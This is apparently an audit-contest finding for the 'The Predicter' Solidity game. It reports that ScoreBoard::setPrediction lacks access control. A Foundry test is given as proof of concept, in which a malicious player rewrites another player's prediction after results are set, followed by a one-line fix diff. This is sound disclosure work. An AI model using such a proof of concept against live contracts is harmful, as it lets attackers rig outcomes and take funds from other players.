First Flight #20: The Predicter
First Flight #20
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Malicious player can change other players' predictions even after the result is in

lulox

Description:

Lack of access control in ScoreBoard::setPrediction allows a malicious player to change other players' predictions even after the result is in.

Impact:

A malicious player can make themselves the winner of the game by making other players lose. Also, this can be used to change their own predictions to make them correct.

Proof of Concept:

Insert the following test into ThePredicter.test.sol:

function test_maliciousPlayerCanSetOtherPlayersResult() public {
address maliciousPlayer = makeAddr("maliciousPlayer");
vm.deal(stranger, 0.0002 ether);
vm.deal(maliciousPlayer, 0.0002 ether);
vm.warp(2);
vm.startPrank(stranger);
thePredicter.makePrediction{value: 0.0001 ether}(0, ScoreBoard.Result.First);
vm.stopPrank();
vm.startPrank(organizer);
scoreBoard.setResult(0, ScoreBoard.Result.First);
vm.stopPrank();
vm.prank(maliciousPlayer);
// Malicious player sets the incorrect result,
// changing the score for stranger from 2 to -1
scoreBoard.setPrediction(address(stranger), 0, ScoreBoard.Result.Draw);
assertEq(scoreBoard.getPlayerScore(stranger), -1);
}

Recommended Mitigation:

Make the ScoreBoard::setPrediction function only callable by ThePredicter::makePrediction function, which sets predictions only for the player calling the function

- function setPrediction(address player, uint256 matchNumber, Result result) public {
+ function setPrediction(address player, uint256 matchNumber, Result result) public onlyThePredicter {
Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.